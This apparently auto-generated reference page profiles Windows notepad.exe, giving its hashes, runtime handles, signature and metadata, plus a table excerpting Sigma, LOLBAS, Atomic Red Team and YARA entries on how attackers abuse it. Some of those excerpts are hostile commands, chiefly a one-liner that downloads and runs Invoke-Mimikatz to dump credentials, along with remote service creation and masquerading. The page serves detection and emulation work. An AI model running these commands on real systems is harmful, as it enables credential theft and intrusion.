notepad.exe
- File Path:
C:\Windows\SysWOW64\notepad.exe - Description: Notepad
Screenshot
Hashes
| Type | Hash |
|---|---|
| MD5 | E92D3A824A0578A50D2DD81B5060145F |
| SHA1 | 50EF7C645FD5CBB95D50FBADDF6213800F9296EC |
| SHA256 | 87F53BC444C05230CE439DBB127C03F2E374067D6FB08E91C834371FD9ECF661 |
| SHA384 | 94B1A77101BDDDEC053CF61624F984A858F9A284CE2067EC8497A29A23A056D25D16C4C4D658FEAD8FDE04F4D350F091 |
| SHA512 | 40D0AC6FA5A424B099923FCDB465E9A2F44569AF1C75CF05323315A8720517316A7E8627BE248CFF3A83382FB6DB1CF026161F627A39BC1908E63F67A34C0FD5 |
| SSDEEP | 3072:GLLvkpY5SnMwbv5RkorwMLuflibzL/cNArhCAEf7ngKpIcXNokJrzOxEPcZA8TJa:E6USNVRkIHXO7RN/1y6PcOwej/Hv |
| IMP | 291BF41874EDCDB21D447B43EE0E6B1F |
| PESHA1 | A449A35286CAC895B59970FC543E0E255D62A779 |
| PE256 | A3D73A766B718A3D19322043E6418EB9657F752543BDAFA9FD8BCBFA3E874625 |
Runtime Data
Window Title:
–help - Notepad
Open Handles:
| Path | Type |
|---|---|
| (R-D) C:\Windows\Fonts\StaticCache.dat | File |
| (R-D) C:\Windows\System32\en-US\notepad.exe.mui | File |
| (R-D) C:\Windows\SystemResources\notepad.exe.mun | File |
| (RW-) C:\Users\user | File |
| (RW-) C:\Windows | File |
| (RW-) C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.488_none_11b1e5df2ffd8627 | File |
| \BaseNamedObjects__ComCatalogCache__ | Section |
| \BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000002.db | Section |
| \BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db | Section |
| \BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2 | Section |
| \BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 | Section |
| \BaseNamedObjects\NLS_CodePage_437_3_2_0_0 | Section |
| \Sessions\1\BaseNamedObjects\windows_shell_global_counters | Section |
| \Sessions\1\Windows\Theme1175649999 | Section |
| \Windows\Theme601709542 | Section |
Loaded Modules:
| Path |
|---|
| C:\Windows\SYSTEM32\ntdll.dll |
| C:\Windows\System32\wow64.dll |
| C:\Windows\System32\wow64cpu.dll |
| C:\Windows\System32\wow64win.dll |
| C:\Windows\SysWOW64\notepad.exe |
Signature
- Status: Signature verified.
- Serial:
330000023241FB59996DCC4DFF000000000232 - Thumbprint:
FF82BC38E1DA5E596DF374C53E3617F7EDA36B06 - Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
File Metadata
- Original Filename: NOTEPAD.EXE
- Product Name: Microsoft Windows Operating System
- Company Name: Microsoft Corporation
- File Version: 10.0.19041.1 (WinBuild.160101.0800)
- Product Version: 10.0.19041.1
- Language: English (United States)
- Legal Copyright: Microsoft Corporation. All rights reserved.
- Machine Type: 32-bit
File Scan
- VirusTotal Detections: 0/76
- VirusTotal Link: https://www.virustotal.com/gui/file/87f53bc444c05230ce439dbb127c03f2e374067d6fb08e91c834371fd9ecf661/detection
Possible Misuse
The following table contains possible examples of notepad.exe being misused. While notepad.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
| Source | Source File | Example | License |
|---|---|---|---|
| sigma | image_load_susp_image_load.yml | - '\notepad.exe' |
DRL 1.0 |
| sigma | net_connection_win_notepad_network_connection.yml | title: Notepad Making Network Connection |
DRL 1.0 |
| sigma | net_connection_win_notepad_network_connection.yml | description: Detects suspicious network connection by Notepad |
DRL 1.0 |
| sigma | net_connection_win_notepad_network_connection.yml | - https://blog.cobaltstrike.com/2013/08/08/why-is-notepad-exe-connecting-to-the-internet/ |
DRL 1.0 |
| sigma | net_connection_win_notepad_network_connection.yml | Image\|endswith: '\notepad.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_gup.yml | description: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks |
DRL 1.0 |
| sigma | proc_creation_win_susp_gup.yml | - '\Users\\*\AppData\Local\Notepad++\updater\GUP.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_gup.yml | - '\Users\\*\AppData\Roaming\Notepad++\updater\GUP.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_gup.yml | - '\Program Files\Notepad++\updater\GUP.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_gup.yml | - '\Program Files (x86)\Notepad++\updater\GUP.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_gup.yml | - Execution of tools named GUP.exe and located in folders different than Notepad++\updater |
DRL 1.0 |
| LOLBAS | Gpup.yml | Description: Execute another command through gpup.exe (Notepad++ binary). |
|
| LOLBAS | Gpup.yml | - 'C:\Program Files (x86)\Notepad++\updater\gpup.exe ' |
|
| LOLBAS | Explorer.yml | - Command: explorer.exe C:\Windows\System32\notepad.exe |
|
| LOLBAS | Forfiles.yml | - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe |
|
| LOLBAS | Forfiles.yml | Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder. |
|
| LOLBAS | Forfiles.yml | - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" |
|
| LOLBAS | Forfiles.yml | Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder. |
|
| LOLBAS | pester.yml | - Command: Pester.bat [/help\|?\|-?\|/?] "$null; notepad" |
|
| LOLBAS | pester.yml | Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. Example here executes notepad |
|
| LOLBAS | Winrm.yml | - Command: 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985' |
|
| LOLBAS | Winrm.yml | - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985' |
|
| LOLBAS | Cdb.yml | - Command: cdb.exe -cf x64_calc.wds -o notepad.exe |
|
| LOLBAS | Dxcap.yml | - Command: Dxcap.exe -c C:\Windows\System32\notepad.exe |
|
| LOLBAS | Dxcap.yml | Description: Launch notepad as a subprocess of Dxcap.exe |
|
| atomic-red-team | index.md | - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | - Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | ## Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | Upon successful execution, cscript.exe is renamed as notepad.exe and executed from non-standard path. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | cmd.exe /c %APPDATA%\notepad.exe /B | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | del /Q /F %APPDATA%\notepad.exe >nul 2>&1 | MIT License. © 2018 Red Canary |
| atomic-red-team | T1047.md | When the test completes , a new process will be started locally .A notepad application will be started when input is left on default. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1047.md | | process_to_execute | Name or path of process to execute. | String | notepad.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1047.md | The EncodedCommand in this atomic is the following: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1047.md | You should expect to see notepad.exe running after execution of this test. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1048.003.md | Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1048.003.md | | input_file | Path to file to be exfiltrated. | Path | C:\Windows\System32\notepad.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1048.003.md | Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1048.003.md | | input_file | Path to file to exfiltrate | Path | C:\Windows\System32\notepad.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1053.005.md | This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute “notepad.exe” within | MIT License. © 2018 Red Canary |
| atomic-red-team | T1053.005.md | Create an scheduled task that executes notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1055.001.md | With default arguments, expect to see a MessageBox, with notepad’s icon in taskbar. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1055.001.md | | process_id | PID of input_arguments | Integer | (Start-Process notepad -PassThru).id| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1055.012.md | | sponsor_binary_path | Path of the sponsor binary (executable that will host the binary) | String | C:\Windows\System32\notepad.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1055.012.md | | spawnto_process_name | Name of the process to spawn | String | notepad| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1055.012.md | This module executes notepad.exe from within the WINWORD.EXE process | MIT License. © 2018 Red Canary |
| atomic-red-team | T1059.001.md | Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1059.001.md | $url=’https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1’;$wshell=New-Object -ComObject WScript.Shell;$reg=’HKCU:\Software\Microsoft\Notepad’;$app=’Notepad’;$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName(‘System.Windows.Forms’);@(@(‘iWindowPosY’,(String).Split(‘}’)[0].Split(‘=’)[5]),@(‘StatusBar’,0))|ForEach{SP $reg (Item Variable:).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:).Value.id-ieq$curpid}|ForEach{(Variable ).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys(‘^o’);Start-Sleep -Milliseconds 500;@($url,(‘ ‘*1000),’~’)|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@(‘^a’,’^c’)|ForEach{$wshell.SendKeys((Item Variable:).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@(‘%f’,’x’)|ForEach{$wshell.SendKeys((Variable ).Value)};If(GPS|?{(Item Variable:).Value.id-ieq$curpid}){@(‘{TAB}’,’~’)|ForEach{$wshell.SendKeys((Item Variable:).Value)} };@(‘iWindowPosDY’,’iWindowPosDX’,’iWindowPosY’,’iWindowPosX’,’StatusBar’)|ForEach{SP $reg (Item Variable:).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr | MIT License. © 2018 Red Canary |
| atomic-red-team | T1105.md | Upon successful execution the test will open calculator and Notepad executable for 10 seconds. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1134.004.md | Spawns a notepad.exe process as a child of the current process. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1134.004.md | Creates a notepad.exe process and then spawns a powershell.exe process as a child of it. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1134.004.md | | parent_name | Parent process to spoof from | Path | $Env:windir\System32\notepad.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1197.md | This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of “svchost.exe” and an Initiating Process Command Line of “svchost.exe -k netsvcs -p -s BITS” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1197.md | | command_path | Path of command to execute | Path | C:\Windows\system32\notepad.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1202.md | “This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1202.md | forfiles /p c:\windows\system32 /m notepad.exe /c #{process} | MIT License. © 2018 Red Canary |
| atomic-red-team | T1202.md | | process | Process to execute | String | notepad.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.004.md | Copy-Item -Path “$([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())InstallUtil.exe” -Destination “$Env:windir\System32\Tasks\notepad.exe” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.004.md | InstallUtilPath = “$Env:windir\System32\Tasks\notepad.exe” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.004.md | Remove-Item -Path “$Env:windir\System32\Tasks\notepad.exe” -ErrorAction Ignore | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.007.md | Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.007.md | Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | | exe_to_launch | Path of the executable to launch | Path | %windir%\System32\notepad.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.001.md | Change Default File Association From cmd.exe of hta to notepad. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.001.md | Upon successful execution, cmd.exe will change the file association of .hta to notepad.exe. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.001.md | | target_extension_handler | txtfile maps to notepad.exe | Path | txtfile| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.003.md | After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.003.md | CommandLineTemplate=”$($Env:SystemRoot)\System32\notepad.exe”;} | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.010.md | AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don’t keep getting message boxes showing up. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.012.md | <blockquote>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010) |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.012.md | | target_binary | Binary To Attach To | Path | C:\Windows\System32\notepad.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1547.002.md | After a reboot, Notepad.exe will be executed as child process of lsass.exe. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1548.002.md | Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1548.002.md | | command.to.execute | Command to execute | String | cmd.exe /c notepad.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1564.004.md | folder to view that the alternate data stream exists. To view the data in the alternate data stream, run “notepad T1564.004_has_ads.txt:adstest.txt” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1564.004.md | in the %temp% direcotry to view all files with hidden data streams. To view the data in the alternate data stream, run “notepad.exe T1564.004_has_ads_powershell.txt:adstest.txt” in the %temp% folder. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1574.002.md | - Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary | MIT License. © 2018 Red Canary |
| atomic-red-team | T1574.002.md | ## Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary | MIT License. © 2018 Red Canary |
| atomic-red-team | T1574.002.md | GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1574.002.md | | gup_executable | GUP is an open source signed binary used by Notepad++ for software updates | Path | PathToAtomicsFolder\T1574.002\bin\GUP.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1574.012.md | Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing notepad.exe with high integrity. |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1574.012.md | the notepad process will not execute with high integrity. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1574.012.md | level of Event Viewer bypassing UAC and executing notepad.exe with high integrity. If the account used is not a local administrator the profiler DLL will |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1574.012.md | still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. | MIT License. © 2018 Red Canary |
| signature-base | apt_bluetermite_emdivi.yar | $s4 = “\NOTEPAD.EXE” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_molerats_jul17.yar | $s2 = “Notepad++.exe” fullword wide | CC BY-NC 4.0 |
| signature-base | apt_olympic_destroyer.yar | $s3 = “\system32\notepad.exe” fullword wide | CC BY-NC 4.0 |
| signature-base | apt_poisonivy.yar | $s0 = “\notepad.exe” fullword ascii /* score: ‘11.025’ */ | CC BY-NC 4.0 |
| signature-base | apt_ta17_293A.yar | $au2 = “/notepad.png” | CC BY-NC 4.0 |
| signature-base | apt_wildneutron.yar | $n1 = “/c for /L %%i in (1,1,2) DO ping 127.0.0.1 -n 3 & type %%windir%%\notepad.exe > %s & del /f %s” fullword ascii /* PEStudio Blacklist: strings / / score: ‘46.00’ */ | CC BY-NC 4.0 |
| signature-base | apt_woolengoldfish.yar | $s4 = “oShellLink.IconLocation = "notepad.exe, 0"” fullword | CC BY-NC 4.0 |
| signature-base | crime_ransom_ragna_locker.yar | $s2 = “\notepad.exe” fullword wide /* Show ransom note to the victim*/ | CC BY-NC 4.0 |
| signature-base | gen_cn_hacktools.yar | $s14 = “NOTEPAD.EXE result.txt” fullword ascii | CC BY-NC 4.0 |
| signature-base | gen_powershell_empire.yar | $s2 = “$proc = Start-Process -WindowStyle Hidden notepad.exe -PassThru” fullword ascii | CC BY-NC 4.0 |
| signature-base | thor_inverse_matches.yar | description = “Abnormal notepad.exe - typical strings not found in file” | CC BY-NC 4.0 |
| signature-base | thor_inverse_matches.yar | $winxp = “Software\Microsoft\Notepad” wide | CC BY-NC 4.0 |
| signature-base | thor_inverse_matches.yar | $winxp_de = “Software\Microsoft\Notepad” wide | CC BY-NC 4.0 |
| signature-base | thor_inverse_matches.yar | filename == “notepad.exe” | CC BY-NC 4.0 |
| stockpile | 3796a00b-b11d-4731-b4ca-275a07d83299.yml | Start-Process Notepad.exe -NoNewWindow -PassThru -Credential $credential; |
Apache-2.0 |
MIT License. Copyright (c) 2020-2021 Strontic.